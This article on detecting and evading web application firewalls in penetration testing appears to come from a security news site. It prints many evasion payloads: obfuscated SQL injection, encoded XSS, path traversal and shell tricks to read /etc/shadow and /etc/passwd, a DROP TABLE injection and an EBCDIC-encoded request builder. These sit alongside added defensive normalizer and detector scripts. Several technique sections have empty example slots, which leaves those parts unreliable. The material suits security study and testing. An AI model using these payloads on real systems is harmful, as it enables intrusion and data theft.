How to hack and bypass a web application firewall (WAF) during penetration testing

The term web application firewall (WAF) refers to a set of monitoring tools and filters designed to detect and block attacks against a specific web application at the HTTP layer (injection, cross-site scripting, path traversal and similar request-level attacks). According to pentesting experts at the International Institute of Cyber Security (IICS), these are security tools that, in real time, decide whether to allow or deny each request to an online deployment.

Like any other security solution, a WAF is only one complementary layer of a comprehensive security environment, so it must be deployed alongside other elements such as incident monitoring tools or anti-fraud systems; it does not replace fixing the vulnerabilities in the application behind it.

A pentest against a WAF usually starts by determining the real IP address of the origin server (so that the WAF can be bypassed entirely by talking to the origin directly) and, at later stages, tries to evade the protection mechanism itself. Compromising the WAF in this way lets researchers (and also attackers) learn what is behind these deployments.

Pentesting experts estimate that nearly 50% of WAF deployments are vulnerable to one or more evasion methods, as attackers have made great strides in attack variants against these solutions, primarily by delivering malicious payloads disguised as legitimate traffic.

On this occasion, we will show you some techniques and tools to analyze a WAF and evade these security measures. As usual, we remind you that this article was prepared for informational purposes only, so IICS is not responsible for any misuse of the information contained herein.

HOW TO DETECT A WAF?

There is a general process for finding the actual IP address of the origin server behind a target website:

  • Use shodan.io or censys.io to look for hosts that present the site's TLS certificate or content directly, without the WAF in front

To check whether a WAF is in front of the application, pentesting experts recommend relying on the following indicators:

  • A WAF listens on the standard web ports 80, 443, 8000, 8008, 8080 and 8088, so the service answering on those ports may be the filter rather than the application itself

To confirm the presence of such a device (and identify the vendor), testers can:

  • Send a standard GET request from the browser, intercept it and record the response headers: vendor-specific headers and cookies, together with the status code and body returned for an obviously malicious probe, usually identify the product
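To make the header check concrete, here is an added example (not code from the original article) that parses a captured raw HTTP response and matches its headers and cookies against a small, illustrative table of vendor signatures. The signature list, the vendor names it maps to and the sample responses are constructed for the example; extend the table from your own captures, and note that a BIGipServer cookie only proves an F5 load balancer is present, not necessarily its WAF module.

```python
import re

# Illustrative header/cookie signatures (constructed for this example; extend from your own captures).
WAF_SIGNATURES = [
    ("Cloudflare",        "server",      r"^cloudflare"),
    ("Cloudflare",        "cf-ray",      r"."),
    ("Sucuri",            "server",      r"sucuri"),
    ("Sucuri",            "x-sucuri-id", r"."),
    ("Imperva Incapsula", "x-cdn",       r"incapsula"),
    ("Imperva Incapsula", "x-iinfo",     r"."),
    ("Akamai",            "server",      r"akamaighost"),
    ("F5 BIG-IP",         "set-cookie",  r"^(?:BIGipServer|TS[0-9a-f]{6,}=)"),
]


def parse_response(raw: str):
    """Split a raw HTTP response into (status_code, {lower-cased header name: [values]}).
    Repeated headers such as Set-Cookie are kept as a list."""
    lines = raw.replace("\r\n", "\n").split("\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if not line.strip():            # blank line terminates the header block
            break
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def fingerprint_waf(raw: str) -> list:
    """Return the sorted list of vendors whose signature matches the response."""
    _, headers = parse_response(raw)
    vendors = set()
    for vendor, header, pattern in WAF_SIGNATURES:
        for value in headers.get(header, []):
            if re.search(pattern, value, re.IGNORECASE):
                vendors.add(vendor)
    return sorted(vendors)


# Constructed sample responses (not captured from any real host).
CLOUDFLARE_BLOCK = (
    "HTTP/1.1 403 Forbidden\r\n"
    "Server: cloudflare\r\n"
    "CF-RAY: 0123456789abcdef-FRA\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>blocked</html>"
)
BIGIP_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: TS01a2b3c4=0123456789abcdef; Path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)
PLAIN_NGINX = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/1.18.0\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, sample in (("cloudflare", CLOUDFLARE_BLOCK),
                         ("bigip", BIGIP_RESPONSE), ("nginx", PLAIN_NGINX)):
        print(name, parse_response(sample)[0], fingerprint_waf(sample))
```

Feed the script the raw response you saved from Burp or curl -i; a 403 with a vendor header on a request that carries an obvious probe is the strongest signal, because the product's block page is usually more distinctive than its headers on normal traffic.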

WAF HACKING TOOLS

Most attackers use automated tools to speed up web application firewall evasion. Below is a short list of the most popular tools for these activities; their use is only the first step in verifying how much information an attacker would be able to access.

  • w3af: A framework for auditing and attacking web applications

There are many other tools, but pentesting experts claim that these are the most popular.

WAF EVASION

Below we will review some of the best known WAF bypassing techniques.

Case switch technique

It consists of mixing uppercase and lowercase characters in the keywords of the payload. SQL keywords are case-insensitive, so the database executes the statement unchanged, while a filter that matches only lowercase (or only uppercase) keywords misses it.

Basic request payload:

Bypassing technique:

Basic request:

SELECT * FROM * WHERE OWNER = 'NAME_OF_DB'

Bypassing technique:

sELeCt *fRoM*wHerE OWNER='NAME_OF_DB'

Example in URL:

http://example.com/index.php?page_id=-1 UnIoN SeLeCT 1,2,3,4

URL encoding technique

Pentesting experts can also modify a normal payload with URL (percent) encoding. For this technique you can use Burp Suite, whose Decoder tab has a built-in encoder and decoder.

WAF-blocked payload:

Bypassing technique:

%3CSvg%2Fx%3D%22%3E%22%2FOnLoAD%3Dconfirm%28%29%2F%2F

WAF-blocked payload:

UniOn(SeLeCt 1,2,3,4,5,6,7,8,9,10)

Bypassing technique:

UniOn%28SeLeCt+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%29

Example in URL:

https://example.com/page.php?id=1%252f%252a*/UNION%252f%252a /SELECT

Unicode technique

Unicode characters provide excellent options to evade a WAF: look-alike characters that the application normalizes back to ASCII, and overlong UTF-8 sequences that a lenient decoder accepts. Encode the entire payload or just one fragment for satisfactory results.

Basic request:

Obfuscation:

WAF-blocked code:

/?redir=http://google.com

Bypassing technique:

/?redir=http://google。com (the ASCII dot replaced by U+3002 IDEOGRAPHIC FULL STOP, which some URL parsers normalize back to a dot)

WAF-blocked code:

Bypassing technique:

Basic request:

Obfuscation:

%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AFetc%C0%AFshadow (overlong UTF-8: %C0%AE is an overlong encoding of '.', %C0%AF of '/')

HTML encoding technique

According to pentesting experts, web applications decode HTML-encoded special characters before rendering, so a payload can be written with numeric (&#60;) or named (&lt;) HTML entities: the WAF inspects the entities, while the browser renders the decoded tag.

Basic request:

Encoded payload:

"><img src=x onerror=confirm()>

Encoded payload:

Mixed coding techniques

WAF rules tend to target one particular type of encoding at a time. Such filters can be bypassed by combining several encodings in one payload and adding newlines and tabs for further obfuscation.

Obfuscated payload:

Comment technique

Attackers often hide standard payload vectors inside code comments, pentesting experts note. Different payloads call for different obfuscation methods.

WAF-blocked code:

WAF Evasion:

WAF-blocked code:

WAF Evasion:

/?id=1+un/**/ion+sel/**/ect+1,2-

Attackers can also insert comments in the middle of the attack string. For example, a MySQL executable comment such as /*! SELECT */ may be discarded as a comment by the WAF but is passed to the target application and executed by the MySQL database, which treats the body of a /*! ... */ comment as SQL.

Example in URL:

index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4'union%a0select pass from users#

Example in URL:

index.php?page_id=-1 /*! UNION*/ /*! SELECT*/ 1,2,3
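The following added example (not code from the original article) shows why the case switch, comment and tab/line-break tricks described on this page defeat a naive rule, and how a detection engine defeats them in turn by normalizing the input the way MySQL's lexer would before matching. The naive rule, the normalizer and the sample inputs are constructed for the example; the target dialect is assumed to be MySQL (the # and /*! ... */ comment forms are MySQL-specific).

```python
import re

# Illustrative rule of the kind these techniques defeat: case-sensitive and unaware of
# SQL comments. Constructed for this example, not a real vendor signature.
NAIVE_RULE = re.compile(r"union\s+select")

# MySQL lexer behaviour the normaliser reproduces (assumed target: MySQL).
VERSIONED_COMMENT = re.compile(r"/\*!\d{0,6}(.*?)\*/", re.S)  # body of /*!50000 ... */ IS executed
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)                 # /* ... */ acts as a token separator
LINE_COMMENT = re.compile(r"(?:--(?=\s)|#)[^\n]*")             # '-- ' and '#' run to end of line
HARDENED_RULE = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b", re.IGNORECASE)


def normalize_sql(fragment: str) -> str:
    """Rewrite user input the way MySQL will see it, then lower-case it for matching."""
    s = VERSIONED_COMMENT.sub(r" \1 ", fragment)   # keep the executable body
    s = BLOCK_COMMENT.sub(" ", s)                  # drop ordinary comments
    s = LINE_COMMENT.sub(" ", s)
    s = re.sub(r"\s+", " ", s)                     # tabs, CR/LF and NBSP (the %a0 trick) -> one space
    return s.strip().lower()


def naive_blocks(fragment: str) -> bool:
    return NAIVE_RULE.search(fragment) is not None


def hardened_blocks(fragment: str) -> bool:
    return HARDENED_RULE.search(normalize_sql(fragment)) is not None


# Constructed inputs, already URL-decoded as the application would receive them.
# Value: (naive rule blocks it?, hardened rule blocks it?)
SAMPLES = {
    "1 UnIoN SeLeCT 1,2,3,4":              (False, True),   # case switch
    "-1 /*! UNION*/ /*! SELECT*/ 1,2,3":    (False, True),   # MySQL executable comments
    "1 union/**/select 1,2":                (False, True),   # comment used as separator
    "1\tunion#\n\rselect--\n\r1,2,3":        (False, True),   # tab, '#' comment and line breaks
    "SELECT name FROM users WHERE id = 1":   (False, False),  # ordinary query: no false positive
}


def evaluate() -> dict:
    """Run both rules over every sample; returns {sample: (naive, hardened)}."""
    return {s: (naive_blocks(s), hardened_blocks(s)) for s in SAMPLES}


if __name__ == "__main__":
    for sample, result in evaluate().items():
        print(result, repr(sample), "->", repr(normalize_sql(sample)))
```

The normalizer has to mirror the dialect the application actually uses: a PostgreSQL backend does not treat # as a comment and does not execute /*! */ bodies, so the same rewrite would produce false positives there. Either way, the WAF rule is a mitigation; the fix is parameterized queries in the application.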

Double encoding method

WAF filters typically percent-decode request data once before inspecting it. Poorly designed filters can be evaded with relative ease by encoding the payload twice, say pentesting experts: the filter decodes one layer and sees only harmless percent sequences, while the application decodes the remaining layer. This only works when some backend component actually performs that second decoding.

Basic request:

http://example/cgi/../../winnt/system32/cmd.exe?/c+dir+c:

Obfuscated payload:

http://example/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:

Basic request:

Obfuscated payload:

%253Cscript%253Econfirm()%253C%252Fscript%253E
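As an added example (not code from the original article), the code below shows the difference between a filter that percent-decodes exactly once and one that canonicalizes the value until it stops changing; it also folds the overlong UTF-8 sequences used in the Unicode technique above, so it covers the URL encoding, Unicode and double encoding sections together. The blocklist pattern, the round limit and the sample inputs are constructed for the example.

```python
import re
from urllib.parse import unquote_to_bytes

# Illustrative blocklist of the kind a simplistic rule uses (constructed for this example).
BLOCK_RE = re.compile(r"<script|\.\./|\bunion\b\s+select", re.IGNORECASE)


def fold_overlong_utf8(data: bytes) -> bytes:
    """Collapse overlong two-byte UTF-8 sequences (lead byte C0/C1) to the ASCII byte they
    encode, e.g. C0 AE -> '.', C0 AF -> '/'. Strict decoders reject these; the evasion
    relies on a lenient backend that accepts them, so the canonical form must match it."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def decode_once(value: str) -> str:
    """One percent-decoding pass, with overlong sequences folded."""
    return fold_overlong_utf8(unquote_to_bytes(value)).decode("utf-8", errors="replace")


def canonicalize(value: str, max_rounds: int = 3):
    """Decode repeatedly until the value stops changing or max_rounds is reached.
    Returns (canonical_value, rounds_that_changed_something)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = decode_once(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def naive_is_blocked(value: str) -> bool:
    """A filter that decodes exactly once, as a poorly designed rule does."""
    return BLOCK_RE.search(decode_once(value)) is not None


def hardened_is_blocked(value: str) -> bool:
    """Inspect the fully canonicalised value instead."""
    canonical, _ = canonicalize(value)
    return BLOCK_RE.search(canonical) is not None


if __name__ == "__main__":
    for sample in ("%253Cscript%253Econfirm()%253C%252Fscript%253E",
                   "cgi/%252E%252E%252F%252E%252E%252Fwinnt",
                   "%C0%AE%C0%AE%C0%AFetc%C0%AFshadow",
                   "id=1"):
        print(canonicalize(sample), naive_is_blocked(sample), hardened_is_blocked(sample))
```

The decode loop is the conservative choice: it blocks everything the application might end up seeing, at the price of false positives when a legitimate value genuinely contains a percent sign followed by hex digits. Matching the application's real decoding depth (and its tolerance for overlong sequences) is better still, which is why the check belongs as close to the decoder as possible.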

Template obfuscation

Several command-line utilities rely on shell wildcard patterns (globbing with ? and *) that match multiple files. Because the shell expands such a pattern to a matching path before running the command, system commands can be executed without the command or file name ever appearing literally in the request.

Basic request:

Obfuscated payload:

Characters used:

Basic requests:

Obfuscated payload:

Characters used:

Dynamic loading technique

Programming languages have different syntax for string concatenation. According to pentesting experts, this allows you to build payloads that are only assembled at run time and so evade various filters and rules.

Basic request:

Obfuscated payload:

Basic request:

Obfuscated payload:

/bi'n'''/c''at' /e'tc'/sh''ad'ow

Bash joins adjacent quoted and unquoted fragments into a single word before execution, so quotes can be scattered through a path and the command still resolves.

Basic request:

Obfuscated payload:

Junk character technique

These are simple payloads that a WAF filters easily. In some cases, adding junk characters that the target parser ignores helps avoid detection, letting pentesting experts defeat regular-expression-based firewalls.

Basic request:

Obfuscated payload:

Basic request:

Obfuscated payload:

Basic request:

WAF Evasion:

Line break technique

Many regular-expression-based WAF rules match within a single line. The line break technique (inserting CR and LF characters) can break the firewall's regular expression and bypass the check while the backend still parses the payload.

Basic request:

Obfuscated payload:

Invalid uninitialized variable technique

Regular expression filters can be bypassed with uninitialized shell variables: an unset variable expands to the empty string, so a reference such as $u inserted inside a path vanishes at execution time. Bash and Perl both behave this way (a shell running with set -u would raise an error instead).

Basic request:

Obfuscated payload:

Basic request:

Obfuscated payload:

$u/bin$u/cat$u $u/etc$u/shadow$u

Basic request:

Obfuscated payload:

$aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff
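As an added example (not code from the original article), the code below reproduces how a POSIX shell resolves the quote-concatenation and uninitialized-variable payloads from this section, and uses that to detect a file-read command that a plain regex over the raw string would miss. The detection policy (a read utility pointed at /etc/passwd or /etc/shadow) and the sample payloads are constructed for the example; the payloads are modelled on, but not identical to, the ones printed above.

```python
import re
import shlex

# A shell variable reference ($u, ${u}). It is treated as unset, i.e. expanding to nothing,
# which is exactly what the uninitialised-variable trick relies on.
VAR_REF = re.compile(r"\$\{?[A-Za-z_][A-Za-z0-9_]*\}?")

# Illustrative detection policy (constructed for this example, not a vendor rule).
READ_CMD = re.compile(r"^(?:/(?:usr/)?bin/)?(?:cat|tac|head|tail|more|less|nl|strings)$")
SENSITIVE_FILES = {"/etc/passwd", "/etc/shadow"}


def normalize_shell_payload(payload: str) -> list:
    """Return the words a POSIX shell would execute for `payload`: unset variables
    expand to '', and adjacent quoted/unquoted fragments such as /bi'n'/c''at are
    merged into one word by quote removal (shlex in POSIX mode reproduces this)."""
    expanded = VAR_REF.sub("", payload)
    try:
        return shlex.split(expanded)
    except ValueError:          # unbalanced quotes: the shell would reject it as well
        return []


def looks_like_file_read(payload: str) -> bool:
    """True when the normalised command is a read utility aimed at a credential file."""
    words = normalize_shell_payload(payload)
    return (len(words) >= 2
            and READ_CMD.match(words[0]) is not None
            and any(w in SENSITIVE_FILES for w in words[1:]))


# Constructed payloads in the styles shown in this section.
PAYLOADS = [
    "/bi'n'/c''at /e't'c/pa'ss'wd",                                   # quote concatenation
    "$u/bin$u/cat$u $u/etc$u/passwd$u",                               # uninitialised variable
    "$aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/shadow$fffffff",
    "ls -la /tmp",                                                    # benign command
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(looks_like_file_read(p), normalize_shell_payload(p), repr(p))
```

Treating every variable as unset is deliberately lossy (a real $HOME would also disappear), which is acceptable for a detector that only needs the command shape. Wildcard patterns such as /???/??t are not resolved here because expansion depends on the target file system; a detector can only flag the presence of globbing characters in a command position.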

Tabs and line breaks

Tabs are often used to bypass firewalls, especially those based on regular expressions: a rule that expects a literal space between keywords does not match a tab, while the SQL parser treats both as whitespace.

Basic request:

Bypassing technique:

Variant:

Basic request:

http://test.com/test?id=1 union select 1,2,3

Bypassing technique:

http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3

Basic request:

Obfuscated payload:

Token Breakers

Token-breaker attacks target the way a WAF splits a request into tokens before matching it against its rules, pentesting experts say. A token breaker is a character sequence that changes how the string is divided into tokens, so the filter sees something different from what the backend parser sees. The request must remain valid for the backend when token breakers are used.

Our payload:

?id='-sqlite_version() UNION SELECT passwords FROM users -

Example: unknown context for the pentester.

First payload:

?id=12);D ROP TABLE users -

Second payload:

?id=133) INTO OUTFILE 'xxx' -

Obfuscation technique in other formats

Many web applications accept request data in character sets other than UTF-8 and decode it accordingly. The goal is to obfuscate the payload in a format the WAF does not understand, while the server still decodes it and forwards the payload to the application.

IIS case:

IIS 6, 7.5, 8 and 10 accept request bodies declared as IBM037 (EBCDIC) through the charset parameter of the Content-Type header and decode the parameters server-side.

Request with parameters in the usual encoding:

POST /example.aspx?id7=sometext HTTP/1.1
Host: target.org
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 27

id2='union all select * from users-

The same request with the parameters encoded as IBM037:

POST /example.aspx?%89%84%F7=%A2%95%94%86%A3%88%89%95%87 HTTP/1.1
Host: target.org
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 127

%89%84%F2=%7D%A4%95%89%97%95%40%81%93%94%40%A2%85%93%85%84%A3%40%5C%40%86%99
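Added example (not part of the original article): a small script that produces the IBM037 percent-encoding with Python's cp037 codec (the codec name for IBM037) and shows what a backend honouring the declared charset decodes versus what a UTF-8-only inspection engine sees. The parameter names, values and host are modelled on the request above; note that the query string in that captured request does not decode to sometext under cp037, so treat the script's output as the reference.

```python
from urllib.parse import unquote_to_bytes

# Charset label used on the wire -> Python codec. IBM037 is EBCDIC, cp037 in Python.
CHARSET_TO_CODEC = {"ibm037": "cp037", "utf-8": "utf-8"}


def percent_encode(text: str, codec: str) -> str:
    """Percent-encode every byte of `text` in the given codec (e.g. 'id7' -> %89%84%F7)."""
    return "".join("%%%02X" % b for b in text.encode(codec))


def encode_form_body(params: dict, charset: str = "ibm037") -> str:
    codec = CHARSET_TO_CODEC.get(charset.lower(), charset)
    return "&".join(f"{percent_encode(k, codec)}={percent_encode(v, codec)}"
                    for k, v in params.items())


def build_request(path: str, params: dict, host: str = "target.org",
                  charset: str = "ibm037") -> str:
    """Full POST request text; the charset parameter is what makes the server decode EBCDIC."""
    body = encode_form_body(params, charset)
    return (f"POST {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Content-Type: application/x-www-form-urlencoded; charset={charset}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")


def backend_view(body: str, charset: str) -> dict:
    """What a backend that honours the declared charset reconstructs from the body."""
    codec = CHARSET_TO_CODEC.get(charset.lower(), charset)
    out = {}
    for pair in body.split("&"):
        k, _, v = pair.partition("=")
        out[unquote_to_bytes(k).decode(codec)] = unquote_to_bytes(v).decode(codec)
    return out


def waf_view(body: str) -> str:
    """What an inspection engine that assumes UTF-8 sees after percent-decoding:
    every EBCDIC byte is >= 0x80 and invalid as UTF-8, so no keyword survives."""
    return unquote_to_bytes(body).decode("utf-8", errors="replace")


if __name__ == "__main__":
    params = {"id2": "'union all select * from users-"}    # constructed payload
    print(build_request("/example.aspx", params))
    print("backend sees:", backend_view(encode_form_body(params), "ibm037"))
    print("waf sees:    ", waf_view(encode_form_body(params)))
```

The defensive counterpart is just as short: an inspection engine must either decode the body with the charset the backend will use or reject charsets it cannot interpret, and the application itself should not accept a client-supplied charset it has no need for.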

Finally, pentesting experts offer a number of useful tips for these security tests:

  • Always try to address the problem as comprehensively as possible

For further reports on vulnerabilities, pentesting, exploits, malware variants, cybersecurity risks and information security courses, feel free to visit the International Institute of Cyber Security (IICS) websites, as well as the official platforms of technology companies.

Originally published at https://www.securitynewspaper.com on September 16, 2021.

Knowledge belongs to the world
